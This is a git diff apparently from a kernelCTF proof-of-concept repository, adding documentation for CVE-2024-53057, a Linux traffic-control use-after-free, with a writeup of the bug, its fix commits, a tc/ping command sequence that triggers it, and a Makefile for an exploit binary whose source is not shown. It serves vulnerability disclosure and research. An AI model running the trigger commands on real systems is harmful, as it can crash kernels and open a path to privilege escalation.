google · hexfoureight · Dec 19, 2025 · Dec 19, 2025 · Dec 19, 2025 · Dec 19, 2025
diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md
diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg
diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg
diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md
@@ -0,0 +1,19 @@
+A vulnerability in the traffic control subsystem can lead to a use-after-free. It is possible to create a non-ingress qdisc with the handle `TC_H_MAJ(TC_H_INGRESS)` (that is `0xffff0000`), which will make `qdisc_tree_reduce_backlog()` assume that it is an ingress qdisc and skip `qlen_notify()` on its classes. This can leave a dangling active list pointer to a class if it is deleted while a packet is enqueued to it.
+
+To trigger the vulnerability, we create a DRR qdisc with handle `TC_H_MAJ(TC_H_INGRESS)` and one class. A netem qdisc is added as the child of this class and configured to delay packets. A packet is then sent and the DRR class is deleted while it is still enqueued at its child. The bug causes `qlen_notify()` to return without removing the DRR class from its active list. It then remains on the active list after being freed, leading to a use-after-free in `drr_dequeue()`.
+
+The use-after-free was introduced with commit `066a3b5b2346 ("sch_api: fix qdisc_tree_decrease_qlen() loop")` and fixed with commit `2e95c4384438 ("net/sched: stop qdisc_tree_reduce_backlog on TC_H_ROOT)`. It affected kernel versions `2.6.25` to `6.11.6`
+
+The vulnerability requires `CAP_NET_ADMIN` and can therefore only be exploited for privilege escalation from a user namespace. The following commands will trigger it and cause a use-after-free:
+
+```
+ip link set lo up
+tc qdisc add dev lo parent root handle ffff: drr
+tc filter add dev lo parent ffff: basic classid ffff:1
+tc class add dev lo parent ffff: classid ffff:1 drr
+tc qdisc add dev lo parent ffff:1 netem delay 1s
+ping -c1 -W0.01 localhost
+tc class del dev lo classid ffff:1
+tc class add dev lo parent ffff: classid ffff:1 drr
+ping -c1 -W0.01 localhost
+```
diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile
@@ -0,0 +1,7 @@
+CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-address-of-packed-member -static -D COS
+
+exploit: exploit.c
+	gcc $(CFLAGS) -o $@ $<
+
+run:
+	./exploit
diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit